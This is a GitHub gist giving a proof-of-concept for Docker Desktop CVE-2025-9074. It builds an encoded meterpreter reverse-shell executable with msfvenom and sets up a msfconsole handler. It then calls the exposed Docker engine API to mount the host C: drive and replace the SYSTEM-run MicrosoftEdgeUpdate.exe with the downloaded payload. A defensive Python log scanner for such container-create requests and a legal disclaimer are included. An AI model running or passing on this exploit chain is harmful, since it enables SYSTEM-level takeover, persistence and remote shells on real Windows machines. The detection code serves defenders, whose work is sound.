@suuhm
Last active September 13, 2025 19:06
Autorun your wished payload with Hijacking MSEdgeUpdate Schedule Task via Docker Desktop CVE-2025-9074 - PoC


More info about the CVE: https://blog.qwertysecurity.com/Articles/blog3.html

  1. Autostart:
  2. TaskScheduler:

```powershell
# check scheduled tasks (the Windows counterpart of cron jobs) with:
Get-ScheduledTask | Where-Object {$_.State -eq 'Ready'}
```

Trying with:

  • `C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe` (runs as SYSTEM)
  • `C:\Users\username\AppData\Local\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe` (runs as the user)
  • `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp` (classic Start Menu autostart folder)

```shell
# Payload creation with bad encoding...
# try to pentest with Defender turned off!
# (shikata_ga_nai encoder, with 5 iterations):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o calc.exe
python -m http.server 8889
```

MSFCONSOLE

```shell
# msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
# set ExitOnSession false
exploit -j
```

RUN on DOCKER

```shell
# Download my "calc" Payload from $HOST ;)
# wget http://host.docker.internal:8000/calc.exe
# mv calc.exe EdgeUpdate\MicrosoftEdgeUpdate.exe
HOST=127.0.0.1
wget --header='Content-Type: application/json' \
--post-data='{"Image":"alpine","Cmd":["sh","-c","wget http://$HOST:8000/calc.exe -O host_root/Program\\ Files\\ \\(x86\\)/Microsoft/EdgeUpdate/MicrosoftEdgeUpdate.exe"],"HostConfig":{"Binds":["/mnt/host/c:/host_root"]}}' \
-O - http://192.168.65.7:2375/containers/create > create.json
cid=$(cut -d'"' -f4 create.json)
wget --post-data='' -O - http://192.168.65.7:2375/containers/$cid/start
```
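From the defender's side, the request above is easy to recognise: the only thing that makes it dangerous is the `Binds` entry that maps the Docker Desktop host filesystem (`/mnt/host/c`) into the container, combined with a command that writes into that mount. The following Python is an added example, not part of the gist and not Docker's code: it scans audit-logged `POST /containers/create` bodies (as a proxy or the engine's own request logging might record them) and flags host-filesystem binds, host-filesystem `Mounts`, privileged containers, and commands that reference the host mount target. The audit-log line layout, the source addresses, the timestamps and the host-path prefixes other than `/mnt/host/` are constructed assumptions and should be adjusted to the installation being monitored.

```python
import json
import re
from typing import List, Tuple

# Assumption: mount prefixes under which Docker Desktop exposes the host
# filesystem inside its Linux VM. "/mnt/host/" is the prefix used in the PoC
# above; the others are constructed placeholders to adjust per installation.
HOST_FS_PREFIXES = ("/mnt/host/", "/host_mnt/", "/run/desktop/mnt/host/")

# Constructed audit-log layout: "<timestamp> <source-ip> POST <api-path> <json-body>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+POST\s+(?:/v[\d.]+)?/containers/create\s+(?P<body>\{.*\})$"
)


def _is_host_path(src: str) -> bool:
    """True when a bind/mount source is the host root or lives under a host prefix."""
    return src == "/" or src.startswith(HOST_FS_PREFIXES)


def analyse_create_request(body: str) -> List[str]:
    """Return findings for one /containers/create JSON body (empty list = nothing suspicious)."""
    req = json.loads(body)
    host_cfg = req.get("HostConfig") or {}
    findings: List[str] = []
    host_targets: List[str] = []

    # Legacy "Binds" entries: "source:target[:options]" (Linux-VM-side paths assumed)
    for bind in host_cfg.get("Binds") or []:
        parts = bind.split(":")
        src, dst = parts[0], (parts[1] if len(parts) > 1 else "?")
        if _is_host_path(src):
            host_targets.append(dst)
            findings.append(f"host filesystem bind {src} -> {dst}")

    # Newer "Mounts" entries carry explicit Source/Target/Type fields
    for mount in host_cfg.get("Mounts") or []:
        if mount.get("Type") == "bind" and _is_host_path(mount.get("Source", "")):
            dst = mount.get("Target", "?")
            host_targets.append(dst)
            findings.append(f"host filesystem mount {mount['Source']} -> {dst}")

    if host_cfg.get("Privileged"):
        findings.append("privileged container")

    # A command that names the mount target is the strongest signal that the
    # container exists to read or write the host rather than to run a workload.
    cmd = req.get("Cmd") or []
    cmd_text = " ".join(cmd) if isinstance(cmd, list) else str(cmd)
    for target in host_targets:
        name = target.strip("/")
        if name and name in cmd_text:
            findings.append(f"command references host mount {target}")
            break
    return findings


def scan_audit_log(lines: List[str]) -> List[Tuple[str, str, List[str]]]:
    """Apply analyse_create_request to every create call found in an audit log."""
    hits: List[Tuple[str, str, List[str]]] = []
    for line in lines:
        match = LOG_RE.match(line.rstrip("\n"))
        if not match:
            continue
        findings = analyse_create_request(match.group("body"))
        if findings:
            hits.append((match.group("ts"), match.group("src"), findings))
    return hits


# Constructed sample log: one benign create call and one that binds the host's
# C: drive and writes into it. Addresses, timestamps and paths are made up.
SAMPLE_LOG = [
    "2025-09-13T19:00:01Z 172.17.0.3 POST /v1.41/containers/create "
    + json.dumps({"Image": "nginx", "Cmd": ["nginx", "-g", "daemon off;"],
                  "HostConfig": {"Binds": ["web-content:/usr/share/nginx/html"]}}),
    "2025-09-13T19:00:07Z 172.17.0.5 POST /containers/create "
    + json.dumps({"Image": "alpine",
                  "Cmd": ["sh", "-c", "cp /tmp/payload.exe host_root/Windows/Temp/"],
                  "HostConfig": {"Binds": ["/mnt/host/c:/host_root"]}}),
]

if __name__ == "__main__":
    for ts, src, findings in scan_audit_log(SAMPLE_LOG):
        print(f"{ts} from {src}:")
        for finding in findings:
            print("  -", finding)
```

Any hit from a container-side source address is worth treating as an incident on an unpatched Docker Desktop, because the engine API on the VM address should never be reachable from a workload in the first place; on a patched install the same rule still catches a compromised host-side client that tries the same mount.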

⚠️ Important Security Notice ⚠️

This gist contains payloads and exploit scripts intended only for authorized security testing and educational purposes. Unauthorized use or distribution of these materials is strictly prohibited and may result in legal consequences.

  • Use the provided code exclusively in controlled environments or with explicit permission from system owners.
  • The authors do not assume any liability for misuse or damage caused by improper use.
  • Always practice responsible disclosure and follow ethical guidelines in security research.

By using this gist, you acknowledge and agree to comply with these terms.
